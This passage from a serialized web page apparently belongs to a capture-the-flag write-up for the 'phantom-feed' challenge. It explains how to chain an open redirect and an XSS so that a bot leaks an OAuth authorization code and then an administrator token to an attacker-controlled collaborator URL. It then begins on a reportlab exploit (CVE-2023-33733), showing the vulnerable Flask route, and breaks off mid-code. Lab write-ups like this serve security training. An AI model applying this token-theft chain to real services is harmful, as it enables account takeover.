ldren":32986},{"style":312},[32987],{"type":38,"value":5584},{"type":33,"tag":128,"props":32989,"children":32990},{"style":523},[32991],{"type":38,"value":32736},{"type":33,"tag":128,"props":32993,"children":32994},{"style":312},[32995],{"type":38,"value":5584},{"type":33,"tag":128,"props":32997,"children":32998},{"style":523},[32999],{"type":38,"value":32916},{"type":33,"tag":128,"props":33001,"children":33002},{"style":312},[33003],{"type":38,"value":5584},{"type":33,"tag":128,"props":33005,"children":33006},{"style":523},[33007],{"type":38,"value":32574},{"type":33,"tag":128,"props":33009,"children":33010},{"style":312},[33011],{"type":38,"value":5584},{"type":33,"tag":128,"props":33013,"children":33014},{"style":523},[33015],{"type":38,"value":32644},{"type":33,"tag":128,"props":33017,"children":33018},{"style":312},[33019],{"type":38,"value":5584},{"type":33,"tag":128,"props":33021,"children":33022},{"style":523},[33023],{"type":38,"value":32787},{"type":33,"tag":128,"props":33025,"children":33026},{"style":312},[33027],{"type":38,"value":5584},{"type":33,"tag":128,"props":33029,"children":33030},{"style":523},[33031],{"type":38,"value":32556},{"type":33,"tag":128,"props":33033,"children":33034},{"style":312},[33035],{"type":38,"value":5584},{"type":33,"tag":128,"props":33037,"children":33038},{"style":523},[33039],{"type":38,"value":32600},{"type":33,"tag":128,"props":33041,"children":33042},{"style":312},[33043],{"type":38,"value":5584},{"type":33,"tag":128,"props":33045,"children":33046},{"style":523},[33047],{"type":38,"value":32583},{"type":33,"tag":128,"props":33049,"children":33050},{"style":312},[33051],{"type":38,"value":5584},{"type":33,"tag":128,"props":33053,"children":33054},{"style":523},[33055],{"type":38,"value":32635},{"type":33,"tag":128,"props":33057,"children":33058},{"style":312},[33059],{"type":38,"value":5584},{"type":33,"tag":128,"props":33061,"children":33062},{"style":523},[33063],{"type":38,"value":33064},"115",{"type":33,"tag":128,"p
rops":33066,"children":33067},{"style":312},[33068],{"type":38,"value":5584},{"type":33,"tag":128,"props":33070,"children":33071},{"style":523},[33072],{"type":38,"value":32644},{"type":33,"tag":128,"props":33074,"children":33075},{"style":312},[33076],{"type":38,"value":5584},{"type":33,"tag":128,"props":33078,"children":33079},{"style":523},[33080],{"type":38,"value":32556},{"type":33,"tag":128,"props":33082,"children":33083},{"style":312},[33084],{"type":38,"value":5584},{"type":33,"tag":128,"props":33086,"children":33087},{"style":523},[33088],{"type":38,"value":32899},{"type":33,"tag":128,"props":33090,"children":33091},{"style":312},[33092],{"type":38,"value":5584},{"type":33,"tag":128,"props":33094,"children":33095},{"style":523},[33096],{"type":38,"value":33097},"121",{"type":33,"tag":128,"props":33099,"children":33100},{"style":312},[33101],{"type":38,"value":5584},{"type":33,"tag":128,"props":33103,"children":33104},{"style":523},[33105],{"type":38,"value":32600},{"type":33,"tag":128,"props":33107,"children":33108},{"style":312},[33109],{"type":38,"value":5584},{"type":33,"tag":128,"props":33111,"children":33112},{"style":523},[33113],{"type":38,"value":32626},{"type":33,"tag":128,"props":33115,"children":33116},{"style":312},[33117],{"type":38,"value":5584},{"type":33,"tag":128,"props":33119,"children":33120},{"style":523},[33121],{"type":38,"value":32583},{"type":33,"tag":128,"props":33123,"children":33124},{"style":312},[33125],{"type":38,"value":5584},{"type":33,"tag":128,"props":33127,"children":33128},{"style":523},[33129],{"type":38,"value":32890},{"type":33,"tag":128,"props":33131,"children":33132},{"style":312},[33133],{"type":38,"value":5584},{"type":33,"tag":128,"props":33135,"children":33136},{"style":523},[33137],{"type":38,"value":32754},{"type":33,"tag":128,"props":33139,"children":33140},{"style":312},[33141],{"type":38,"value":5584},{"type":33,"tag":128,"props":33143,"children":33144},{"style":523},[33145],{"type":38,"value":33146},"63",{"
type":33,"tag":128,"props":33148,"children":33149},{"style":312},[33150],{"type":38,"value":5584},{"type":33,"tag":128,"props":33152,"children":33153},{"style":523},[33154],{"type":38,"value":32925},{"type":33,"tag":128,"props":33156,"children":33157},{"style":312},[33158],{"type":38,"value":5584},{"type":33,"tag":128,"props":33160,"children":33161},{"style":523},[33162],{"type":38,"value":32583},{"type":33,"tag":128,"props":33164,"children":33165},{"style":312},[33166],{"type":38,"value":5584},{"type":33,"tag":128,"props":33168,"children":33169},{"style":523},[33170],{"type":38,"value":32574},{"type":33,"tag":128,"props":33172,"children":33173},{"style":312},[33174],{"type":38,"value":5584},{"type":33,"tag":128,"props":33176,"children":33177},{"style":523},[33178],{"type":38,"value":33097},{"type":33,"tag":128,"props":33180,"children":33181},{"style":312},[33182],{"type":38,"value":5584},{"type":33,"tag":128,"props":33184,"children":33185},{"style":523},[33186],{"type":38,"value":32685},{"type":33,"tag":128,"props":33188,"children":33189},{"style":312},[33190],{"type":38,"value":5584},{"type":33,"tag":128,"props":33192,"children":33193},{"style":523},[33194],{"type":38,"value":33195},"36",{"type":33,"tag":128,"props":33197,"children":33198},{"style":312},[33199],{"type":38,"value":5584},{"type":33,"tag":128,"props":33201,"children":33202},{"style":523},[33203],{"type":38,"value":33204},"123",{"type":33,"tag":128,"props":33206,"children":33207},{"style":312},[33208],{"type":38,"value":5584},{"type":33,"tag":128,"props":33210,"children":33211},{"style":523},[33212],{"type":38,"value":32925},{"type":33,"tag":128,"props":33214,"children":33215},{"style":312},[33216],{"type":38,"value":5584},{"type":33,"tag":128,"props":33218,"children":33219},{"style":523},[33220],{"type":38,"value":32644},{"type":33,"tag":128,"props":33222,"children":33223},{"style":312},[33224],{"type":38,"value":5584},{"type":33,"tag":128,"props":33226,"children":33227},{"style":523},[33228],{"type"
:38,"value":32583},{"type":33,"tag":128,"props":33230,"children":33231},{"style":312},[33232],{"type":38,"value":5584},{"type":33,"tag":128,"props":33234,"children":33235},{"style":523},[33236],{"type":38,"value":32635},{"type":33,"tag":128,"props":33238,"children":33239},{"style":312},[33240],{"type":38,"value":5584},{"type":33,"tag":128,"props":33242,"children":33243},{"style":523},[33244],{"type":38,"value":33245},"40",{"type":33,"tag":128,"props":33247,"children":33248},{"style":312},[33249],{"type":38,"value":5584},{"type":33,"tag":128,"props":33251,"children":33252},{"style":523},[33253],{"type":38,"value":32574},{"type":33,"tag":128,"props":33255,"children":33256},{"style":312},[33257],{"type":38,"value":5584},{"type":33,"tag":128,"props":33259,"children":33260},{"style":523},[33261],{"type":38,"value":32583},{"type":33,"tag":128,"props":33263,"children":33264},{"style":312},[33265],{"type":38,"value":5584},{"type":33,"tag":128,"props":33267,"children":33268},{"style":523},[33269],{"type":38,"value":32626},{"type":33,"tag":128,"props":33271,"children":33272},{"style":312},[33273],{"type":38,"value":5584},{"type":33,"tag":128,"props":33275,"children":33276},{"style":523},[33277],{"type":38,"value":33278},"117",{"type":33,"tag":128,"props":33280,"children":33281},{"style":312},[33282],{"type":38,"value":5584},{"type":33,"tag":128,"props":33284,"children":33285},{"style":523},[33286],{"type":38,"value":32890},{"type":33,"tag":128,"props":33288,"children":33289},{"style":312},[33290],{"type":38,"value":5584},{"type":33,"tag":128,"props":33292,"children":33293},{"style":523},[33294],{"type":38,"value":32839},{"type":33,"tag":128,"props":33296,"children":33297},{"style":312},[33298],{"type":38,"value":5584},{"type":33,"tag":128,"props":33300,"children":33301},{"style":523},[33302],{"type":38,"value":32565},{"type":33,"tag":128,"props":33304,"children":33305},{"style":312},[33306],{"type":38,"value":5584},{"type":33,"tag":128,"props":33308,"children":33309},{"style"
:523},[33310],{"type":38,"value":32644},{"type":33,"tag":128,"props":33312,"children":33313},{"style":312},[33314],{"type":38,"value":5584},{"type":33,"tag":128,"props":33316,"children":33317},{"style":523},[33318],{"type":38,"value":32600},{"type":33,"tag":128,"props":33320,"children":33321},{"style":312},[33322],{"type":38,"value":5584},{"type":33,"tag":128,"props":33324,"children":33325},{"style":523},[33326],{"type":38,"value":32925},{"type":33,"tag":128,"props":33328,"children":33329},{"style":312},[33330],{"type":38,"value":5584},{"type":33,"tag":128,"props":33332,"children":33333},{"style":523},[33334],{"type":38,"value":32583},{"type":33,"tag":128,"props":33336,"children":33337},{"style":312},[33338],{"type":38,"value":5584},{"type":33,"tag":128,"props":33340,"children":33341},{"style":523},[33342],{"type":38,"value":32574},{"type":33,"tag":128,"props":33344,"children":33345},{"style":312},[33346],{"type":38,"value":5584},{"type":33,"tag":128,"props":33348,"children":33349},{"style":523},[33350],{"type":38,"value":33097},{"type":33,"tag":128,"props":33352,"children":33353},{"style":312},[33354],{"type":38,"value":5584},{"type":33,"tag":128,"props":33356,"children":33357},{"style":523},[33358],{"type":38,"value":32600},{"type":33,"tag":128,"props":33360,"children":33361},{"style":312},[33362],{"type":38,"value":5584},{"type":33,"tag":128,"props":33364,"children":33365},{"style":523},[33366],{"type":38,"value":32556},{"type":33,"tag":128,"props":33368,"children":33369},{"style":312},[33370],{"type":38,"value":5584},{"type":33,"tag":128,"props":33372,"children":33373},{"style":523},[33374],{"type":38,"value":32565},{"type":33,"tag":128,"props":33376,"children":33377},{"style":312},[33378],{"type":38,"value":5584},{"type":33,"tag":128,"props":33380,"children":33381},{"style":523},[33382],{"type":38,"value":32565},{"type":33,"tag":128,"props":33384,"children":33385},{"style":312},[33386],{"type":38,"value":5584},{"type":33,"tag":128,"props":33388,"children":33389
},{"style":523},[33390],{"type":38,"value":32839},{"type":33,"tag":128,"props":33392,"children":33393},{"style":312},[33394],{"type":38,"value":5584},{"type":33,"tag":128,"props":33396,"children":33397},{"style":523},[33398],{"type":38,"value":33399},"114",{"type":33,"tag":128,"props":33401,"children":33402},{"style":312},[33403],{"type":38,"value":5584},{"type":33,"tag":128,"props":33405,"children":33406},{"style":523},[33407],{"type":38,"value":33408},"72",{"type":33,"tag":128,"props":33410,"children":33411},{"style":312},[33412],{"type":38,"value":5584},{"type":33,"tag":128,"props":33414,"children":33415},{"style":523},[33416],{"type":38,"value":33417},"84",{"type":33,"tag":128,"props":33419,"children":33420},{"style":312},[33421],{"type":38,"value":5584},{"type":33,"tag":128,"props":33423,"children":33424},{"style":523},[33425],{"type":38,"value":33426},"77",{"type":33,"tag":128,"props":33428,"children":33429},{"style":312},[33430],{"type":38,"value":5584},{"type":33,"tag":128,"props":33432,"children":33433},{"style":523},[33434],{"type":38,"value":33435},"76",{"type":33,"tag":128,"props":33437,"children":33438},{"style":312},[33439],{"type":38,"value":5584},{"type":33,"tag":128,"props":33441,"children":33442},{"style":523},[33443],{"type":38,"value":33444},"41",{"type":33,"tag":128,"props":33446,"children":33447},{"style":312},[33448],{"type":38,"value":5584},{"type":33,"tag":128,"props":33450,"children":33451},{"style":523},[33452],{"type":38,"value":33453},"125",{"type":33,"tag":128,"props":33455,"children":33456},{"style":312},[33457],{"type":38,"value":5584},{"type":33,"tag":128,"props":33459,"children":33460},{"style":523},[33461],{"type":38,"value":32702},{"type":33,"tag":128,"props":33463,"children":33464},{"style":312},[33465],{"type":38,"value":7088},{"type":33,"tag":128,"props":33467,"children":33468},{"style":676},[33469],{"type":38,"value":6040},{"type":33,"tag":128,"props":33471,"children":33472},{"style":312},[33473],{"type":38,"value":6097},{"typ
e":33,"tag":47,"props":33475,"children":33476},{},[33477],{"type":38,"value":33478},"So now we have our open redirect vulnerability and our XSS; we just chain them together, allowing us to retrieve the admin token from the service on port 4000.",{"type":33,"tag":81,"props":33480,"children":33482},{"id":33481},"oauth2code",[33483],{"type":38,"value":32220},{"type":33,"tag":47,"props":33485,"children":33486},{},[33487,33489,33495],{"type":38,"value":33488},"First, we call the bot by redirecting it to the oauth2/code route using the open redirect exploit, and we set the redirection_url parameter to our Burp Collaborator URL. This allows us to retrieve the ",{"type":33,"tag":105,"props":33490,"children":33492},{"className":33491},[],[33493],{"type":38,"value":33494},"authorization_code",{"type":38,"value":33496}," parameter.",{"type":33,"tag":47,"props":33498,"children":33499},{},[33500],{"type":38,"value":33501},"You can find the sent request below:",{"type":33,"tag":75,"props":33503,"children":33505},{"imgSrc":33504},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704320776/writeups/phantom-feed/request_get_code_oauth2.webp",[],{"type":33,"tag":47,"props":33507,"children":33508},{},[33509],{"type":38,"value":33510},"We can see:",{"type":33,"tag":239,"props":33512,"children":33513},{},[33514,33519,33531,33543],{"type":33,"tag":243,"props":33515,"children":33516},{},[33517],{"type":38,"value":33518},"In white, the HTTP headers of the request, including the user's token.",{"type":33,"tag":243,"props":33520,"children":33521},{},[33522,33524,33529],{"type":38,"value":33523},"In green, the exploitation of the open redirect that redirects the bot to the ",{"type":33,"tag":105,"props":33525,"children":33527},{"className":33526},[],[33528],{"type":38,"value":32316},{"type":38,"value":33530}," route.",{"type":33,"tag":243,"props":33532,"children":33533},{},[33534,33536,33541],{"type":38,"value":33535},"In blue, the 
",{"type":33,"tag":105,"props":33537,"children":33539},{"className":33538},[],[33540],{"type":38,"value":32362},{"type":38,"value":33542}," parameter that includes the URL of our Burp Collaborator.",{"type":33,"tag":243,"props":33544,"children":33545},{},[33546],{"type":38,"value":33547},"In red, our XSS payload.",{"type":33,"tag":47,"props":33549,"children":33550},{},[33551,33553],{"type":38,"value":33552},"Here we note that our XSS payload is present but will actually be executed only in the next step. This payload is present because ",{"type":33,"tag":2302,"props":33554,"children":33555},{},[33556,33558,33564,33565,33571],{"type":38,"value":33557},"it is imperative that the client_id and redirect_url parameters be identical during both calls (",{"type":33,"tag":105,"props":33559,"children":33561},{"className":33560},[],[33562],{"type":38,"value":33563},"/code",{"type":38,"value":6345},{"type":33,"tag":105,"props":33566,"children":33568},{"className":33567},[],[33569],{"type":38,"value":33570},"/token",{"type":38,"value":6700},{"type":33,"tag":47,"props":33573,"children":33574},{},[33575,33577,33582],{"type":38,"value":33576},"We can see below the response sent to our collaborator. 
We can now see that the ",{"type":33,"tag":105,"props":33578,"children":33580},{"className":33579},[],[33581],{"type":38,"value":33494},{"type":38,"value":33583}," parameter is present in the response.",{"type":33,"tag":75,"props":33585,"children":33587},{"imgSrc":33586},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319319/writeups/phantom-feed/oauth_token_get_authorized_code.webp",[],{"type":33,"tag":81,"props":33589,"children":33591},{"id":33590},"oauth2token",[33592],{"type":38,"value":33593},"oauth2/token",{"type":33,"tag":47,"props":33595,"children":33596},{},[33597,33599,33605],{"type":38,"value":33598},"So now we have our ",{"type":33,"tag":105,"props":33600,"children":33602},{"className":33601},[],[33603],{"type":38,"value":33604},"authorized_code",{"type":38,"value":33606},", which was sent back to us via our collaborator.",{"type":33,"tag":47,"props":33608,"children":33609},{},[33610,33612,33617,33619,33624],{"type":38,"value":33611},"The next step is to use the ",{"type":33,"tag":105,"props":33613,"children":33615},{"className":33614},[],[33616],{"type":38,"value":33604},{"type":38,"value":33618}," with a call to the ",{"type":33,"tag":105,"props":33620,"children":33622},{"className":33621},[],[33623],{"type":38,"value":32262},{"type":38,"value":33625}," route using the open redirect (as in the previous step). At this point, the bot will execute our XSS payload, which will return the body of the response. 
This body will contain the administrator's token.",{"type":33,"tag":47,"props":33627,"children":33628},{},[33629,33631,33636],{"type":38,"value":33630},"Only the ",{"type":33,"tag":105,"props":33632,"children":33634},{"className":33633},[],[33635],{"type":38,"value":33494},{"type":38,"value":33637}," parameter was added to the request.",{"type":33,"tag":75,"props":33639,"children":33641},{"imgSrc":33640},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704321315/writeups/phantom-feed/request_get_token_admin_oauth2.webp",[],{"type":33,"tag":47,"props":33643,"children":33644},{},[33645],{"type":38,"value":33646},"We can see below the response sent to our collaborator.",{"type":33,"tag":75,"props":33648,"children":33650},{"imgSrc":33649},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319375/writeups/phantom-feed/oauth2_body_stealed.webp",[],{"type":33,"tag":47,"props":33652,"children":33653},{},[33654],{"type":38,"value":33655},"If we decode the JWT, we can see that the data part indeed carries the user \"administrator\", allowing us to proceed to the next step.",{"type":33,"tag":75,"props":33657,"children":33659},{"imgSrc":33658},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319406/writeups/phantom-feed/admin_token.webp",[],{"type":33,"tag":47,"props":33661,"children":33662},{},[33663],{"type":38,"value":33664},"In the following chapter, we will detail what can be done as an administrator.",{"type":33,"tag":40,"props":33666,"children":33668},{"id":33667},"exploit-reportlab-library-cve-2023-33733",[33669],{"type":38,"value":33670},"Exploit reportlab library (CVE-2023-33733)",{"type":33,"tag":47,"props":33672,"children":33673},{},[33674],{"type":38,"value":33675},"We now have an admin token that allows us to interact with the port 4000 service. 
If we take a closer look at the routes of this service, we can see that one route is particularly interesting:",{"type":33,"tag":114,"props":33677,"children":33678},{"lang":10227},[33679],{"type":33,"tag":119,"props":33680,"children":33682},{"className":10231,"code":33681,"language":10227,"meta":8,"style":8},"@web.route(\"/orders/html\", methods = [\"POST\"])\n@admin_middleware\ndef orders_html():\n  color = request.form.get(\"color\")\n\n  if not color:\n    return response(\"No color\"), 400\n\n  db_session = Database()\n  orders = db_session.get_all_orders()\n  \n  if not orders:\n    return response(\"No orders placed\"), 200\n\n  orders_template = render_template(\"orders.html\", color=color)\n  \n  html2pdf = HTML2PDF()\n  pdf = html2pdf.convert(orders_template, orders)\n  \n  pdf.seek(0)\n  return send_file(pdf, as_attachment=True, download_name=\"orders.pdf\", mimetype=\"application/pdf\")\n",[33683],{"type":33,"tag":105,"props":33684,"children":33685},{"__ignoreMap":8},[33686,33754,33766,33782,33835,33842,33863,33900,33907,33928,33957,33964,33984,34020,34027,34080,34087,34108,34155,34162,34191],{"type":33,"tag":128,"props":33687,"children":33688},{"class":130,"line":131},[33689,33693,33697,33701,33705,33709,33713,33718,33722,33726,33730,33734,33738,33742,33746,33750],{"type":33,"tag":128,"props":33690,"children":33691},{"style":312},[33692],{"type":38,"value":29642},{"type":33,"tag":128,"props":33694,"children":33695},{"style":135},[33696],{"type":38,"value":29647},{"type":33,"tag":128,"props":33698,"children":33699},{"style":312},[33700],{"type":38,"value":215},{"type":33,"tag":128,"props":33702,"children":33703},{"style":135},[33704],{"type":38,"value":29656},{"type":33,"tag":128,"props":33706,"children":33707},{"style":312},[33708],{"type":38,"value":5566},{"type":33,"tag":128,"props":33710,"children":33711},{"style":676},[33712],{"type":38,"value":669},{"type":33,"tag":128,"props":33714,"children":33715},{"style":140},[33716],{"type":38,"value":33717},"
/orders/html",{"type":33,"tag":128,"props":33719,"children":33720},{"style":676},[33721],{"type":38,"value":669},{"type":33,"tag":128,"props":33723,"children":33724},{"style":312},[33725],{"type":38,"value":5584},{"type":33,"tag":128,"props":33727,"children":33728},{"style":306},[33729],{"type":38,"value":29682},{"type":33,"tag":128,"props":33731,"children":33732},{"style":312},[33733],{"type":38,"value":5657},{"type":33,"tag":128,"props":33735,"children":33736},{"style":312},[33737],{"type":38,"value":718},{"type":33,"tag":128,"props":33739,"children":33740},{"style":676},[33741],{"type":38,"value":669},{"type":33,"tag":128,"props":33743,"children":33744},{"style":140},[33745],{"type":38,"value":1406},{"type":33,"tag":128,"props":33747,"children":33748},{"style":676},[33749],{"type":38,"value":669},{"type":33,"tag":128,"props":33751,"children":33752},{"style":312},[33753],{"type":38,"value":29721},{"type":33,"tag":128,"props":33755,"children":33756},{"class":130,"line":362},[33757,33761],{"type":33,"tag":128,"props":33758,"children":33759},{"style":312},[33760],{"type":38,"value":29642},{"type":33,"tag":128,"props":33762,"children":33763},{"style":135},[33764],{"type":38,"value":33765},"admin_middleware\n",{"type":33,"tag":128,"props":33767,"children":33768},{"class":130,"line":403},[33769,33773,33778],{"type":33,"tag":128,"props":33770,"children":33771},{"style":300},[33772],{"type":38,"value":10402},{"type":33,"tag":128,"props":33774,"children":33775},{"style":135},[33776],{"type":38,"value":33777}," orders_html",{"type":33,"tag":128,"props":33779,"children":33780},{"style":312},[33781],{"type":38,"value":10412},{"type":33,"tag":128,"props":33783,"children":33784},{"class":130,"line":739},[33785,33790,33794,33798,33802,33806,33810,33814,33818,33822,33827,33831],{"type":33,"tag":128,"props":33786,"children":33787},{"style":323},[33788],{"type":38,"value":33789},"  color 
",{"type":33,"tag":128,"props":33791,"children":33792},{"style":312},[33793],{"type":38,"value":315},{"type":33,"tag":128,"props":33795,"children":33796},{"style":323},[33797],{"type":38,"value":14050},{"type":33,"tag":128,"props":33799,"children":33800},{"style":312},[33801],{"type":38,"value":215},{"type":33,"tag":128,"props":33803,"children":33804},{"style":323},[33805],{"type":38,"value":14844},{"type":33,"tag":128,"props":33807,"children":33808},{"style":312},[33809],{"type":38,"value":215},{"type":33,"tag":128,"props":33811,"children":33812},{"style":323},[33813],{"type":38,"value":13526},{"type":33,"tag":128,"props":33815,"children":33816},{"style":312},[33817],{"type":38,"value":5566},{"type":33,"tag":128,"props":33819,"children":33820},{"style":676},[33821],{"type":38,"value":669},{"type":33,"tag":128,"props":33823,"children":33824},{"style":140},[33825],{"type":38,"value":33826},"color",{"type":33,"tag":128,"props":33828,"children":33829},{"style":676},[33830],{"type":38,"value":669},{"type":33,"tag":128,"props":33832,"children":33833},{"style":312},[33834],{"type":38,"value":2427},{"type":33,"tag":128,"props":33836,"children":33837},{"class":130,"line":765},[33838],{"type":33,"tag":128,"props":33839,"children":33840},{"emptyLinePlaceholder":896},[33841],{"type":38,"value":899},{"type":33,"tag":128,"props":33843,"children":33844},{"class":130,"line":804},[33845,33849,33854,33859],{"type":33,"tag":128,"props":33846,"children":33847},{"style":1576},[33848],{"type":38,"value":16415},{"type":33,"tag":128,"props":33850,"children":33851},{"style":300},[33852],{"type":38,"value":33853}," not",{"type":33,"tag":128,"props":33855,"children":33856},{"style":323},[33857],{"type":38,"value":33858}," 
color",{"type":33,"tag":128,"props":33860,"children":33861},{"style":312},[33862],{"type":38,"value":5318},{"type":33,"tag":128,"props":33864,"children":33865},{"class":130,"line":839},[33866,33870,33875,33879,33883,33888,33892,33896],{"type":33,"tag":128,"props":33867,"children":33868},{"style":1576},[33869],{"type":38,"value":6810},{"type":33,"tag":128,"props":33871,"children":33872},{"style":323},[33873],{"type":38,"value":33874}," response",{"type":33,"tag":128,"props":33876,"children":33877},{"style":312},[33878],{"type":38,"value":5566},{"type":33,"tag":128,"props":33880,"children":33881},{"style":676},[33882],{"type":38,"value":669},{"type":33,"tag":128,"props":33884,"children":33885},{"style":140},[33886],{"type":38,"value":33887},"No color",{"type":33,"tag":128,"props":33889,"children":33890},{"style":676},[33891],{"type":38,"value":669},{"type":33,"tag":128,"props":33893,"children":33894},{"style":312},[33895],{"type":38,"value":30055},{"type":33,"tag":128,"props":33897,"children":33898},{"style":523},[33899],{"type":38,"value":6988},{"type":33,"tag":128,"props":33901,"children":33902},{"class":130,"line":848},[33903],{"type":33,"tag":128,"props":33904,"children":33905},{"emptyLinePlaceholder":896},[33906],{"type":38,"value":899},{"type":33,"tag":128,"props":33908,"children":33909},{"class":130,"line":976},[33910,33915,33919,33924],{"type":33,"tag":128,"props":33911,"children":33912},{"style":323},[33913],{"type":38,"value":33914},"  db_session ",{"type":33,"tag":128,"props":33916,"children":33917},{"style":312},[33918],{"type":38,"value":315},{"type":33,"tag":128,"props":33920,"children":33921},{"style":323},[33922],{"type":38,"value":33923}," 
Database",{"type":33,"tag":128,"props":33925,"children":33926},{"style":312},[33927],{"type":38,"value":7857},{"type":33,"tag":128,"props":33929,"children":33930},{"class":130,"line":988},[33931,33936,33940,33944,33948,33953],{"type":33,"tag":128,"props":33932,"children":33933},{"style":323},[33934],{"type":38,"value":33935},"  orders ",{"type":33,"tag":128,"props":33937,"children":33938},{"style":312},[33939],{"type":38,"value":315},{"type":33,"tag":128,"props":33941,"children":33942},{"style":323},[33943],{"type":38,"value":29780},{"type":33,"tag":128,"props":33945,"children":33946},{"style":312},[33947],{"type":38,"value":215},{"type":33,"tag":128,"props":33949,"children":33950},{"style":323},[33951],{"type":38,"value":33952},"get_all_orders",{"type":33,"tag":128,"props":33954,"children":33955},{"style":312},[33956],{"type":38,"value":7857},{"type":33,"tag":128,"props":33958,"children":33959},{"class":130,"line":1001},[33960],{"type":33,"tag":128,"props":33961,"children":33962},{"style":323},[33963],{"type":38,"value":5894},{"type":33,"tag":128,"props":33965,"children":33966},{"class":130,"line":1014},[33967,33971,33975,33980],{"type":33,"tag":128,"props":33968,"children":33969},{"style":1576},[33970],{"type":38,"value":16415},{"type":33,"tag":128,"props":33972,"children":33973},{"style":300},[33974],{"type":38,"value":33853},{"type":33,"tag":128,"props":33976,"children":33977},{"style":323},[33978],{"type":38,"value":33979}," 
orders",{"type":33,"tag":128,"props":33981,"children":33982},{"style":312},[33983],{"type":38,"value":5318},{"type":33,"tag":128,"props":33985,"children":33986},{"class":130,"line":1026},[33987,33991,33995,33999,34003,34008,34012,34016],{"type":33,"tag":128,"props":33988,"children":33989},{"style":1576},[33990],{"type":38,"value":6810},{"type":33,"tag":128,"props":33992,"children":33993},{"style":323},[33994],{"type":38,"value":33874},{"type":33,"tag":128,"props":33996,"children":33997},{"style":312},[33998],{"type":38,"value":5566},{"type":33,"tag":128,"props":34000,"children":34001},{"style":676},[34002],{"type":38,"value":669},{"type":33,"tag":128,"props":34004,"children":34005},{"style":140},[34006],{"type":38,"value":34007},"No orders placed",{"type":33,"tag":128,"props":34009,"children":34010},{"style":676},[34011],{"type":38,"value":669},{"type":33,"tag":128,"props":34013,"children":34014},{"style":312},[34015],{"type":38,"value":30055},{"type":33,"tag":128,"props":34017,"children":34018},{"style":523},[34019],{"type":38,"value":30060},{"type":33,"tag":128,"props":34021,"children":34022},{"class":130,"line":1038},[34023],{"type":33,"tag":128,"props":34024,"children":34025},{"emptyLinePlaceholder":896},[34026],{"type":38,"value":899},{"type":33,"tag":128,"props":34028,"children":34029},{"class":130,"line":1051},[34030,34035,34039,34043,34047,34051,34056,34060,34064,34068,34072,34076],{"type":33,"tag":128,"props":34031,"children":34032},{"style":323},[34033],{"type":38,"value":34034},"  orders_template 
",{"type":33,"tag":128,"props":34036,"children":34037},{"style":312},[34038],{"type":38,"value":315},{"type":33,"tag":128,"props":34040,"children":34041},{"style":323},[34042],{"type":38,"value":29983},{"type":33,"tag":128,"props":34044,"children":34045},{"style":312},[34046],{"type":38,"value":5566},{"type":33,"tag":128,"props":34048,"children":34049},{"style":676},[34050],{"type":38,"value":669},{"type":33,"tag":128,"props":34052,"children":34053},{"style":140},[34054],{"type":38,"value":34055},"orders.html",{"type":33,"tag":128,"props":34057,"children":34058},{"style":676},[34059],{"type":38,"value":669},{"type":33,"tag":128,"props":34061,"children":34062},{"style":312},[34063],{"type":38,"value":5584},{"type":33,"tag":128,"props":34065,"children":34066},{"style":306},[34067],{"type":38,"value":33858},{"type":33,"tag":128,"props":34069,"children":34070},{"style":312},[34071],{"type":38,"value":315},{"type":33,"tag":128,"props":34073,"children":34074},{"style":323},[34075],{"type":38,"value":33826},{"type":33,"tag":128,"props":34077,"children":34078},{"style":312},[34079],{"type":38,"value":2427},{"type":33,"tag":128,"props":34081,"children":34082},{"class":130,"line":1063},[34083],{"type":33,"tag":128,"props":34084,"children":34085},{"style":323},[34086],{"type":38,"value":5894},{"type":33,"tag":128,"props":34088,"children":34089},{"class":130,"line":1076},[34090,34095,34099,34104],{"type":33,"tag":128,"props":34091,"children":34092},{"style":323},[34093],{"type":38,"value":34094},"  html2pdf ",{"type":33,"tag":128,"props":34096,"children":34097},{"style":312},[34098],{"type":38,"value":315},{"type":33,"tag":128,"props":34100,"children":34101},{"style":323},[34102],{"type":38,"value":34103}," 
HTML2PDF",{"type":33,"tag":128,"props":34105,"children":34106},{"style":312},[34107],{"type":38,"value":7857},{"type":33,"tag":128,"props":34109,"children":34110},{"class":130,"line":1089},[34111,34116,34120,34125,34129,34134,34138,34143,34147,34151],{"type":33,"tag":128,"props":34112,"children":34113},{"style":323},[34114],{"type":38,"value":34115},"  pdf ",{"type":33,"tag":128,"props":34117,"children":34118},{"style":312},[34119],{"type":38,"value":315},{"type":33,"tag":128,"props":34121,"children":34122},{"style":323},[34123],{"type":38,"value":34124}," html2pdf",{"type":33,"tag":128,"props":34126,"children":34127},{"style":312},[34128],{"type":38,"value":215},{"type":33,"tag":128,"props":34130,"children":34131},{"style":323},[34132],{"type":38,"value":34133},"convert",{"type":33,"tag":128,"props":34135,"children":34136},{"style":312},[34137],{"type":38,"value":5566},{"type":33,"tag":128,"props":34139,"children":34140},{"style":323},[34141],{"type":38,"value":34142},"orders_template",{"type":33,"tag":128,"props":34144,"children":34145},{"style":312},[34146],{"type":38,"value":5584},{"type":33,"tag":128,"props":34148,"children":34149},{"style":323},[34150],{"type":38,"value":33979},{"type":33,"tag":128,"props":34152,"children":34153},{"style":312},[34154],{"type":38,"value":2427},{"type":33,"tag":128,"props":34156,"children":34157},{"class":130,"line":1101},[34158],{"type":33,"tag":128,"props":34159,"children":34160},{"style":323},[34161],{"type":38,"value":5894},{"type":33,"tag":128,"props":34163,"children":34164},{"class":130,"line":1114},[34165,34170,34174,34179,34183,34187],{"type":33,"tag":128,"props":34166,"children":34167},{"style":323},[34168],{"type":38,"value":34169},"  
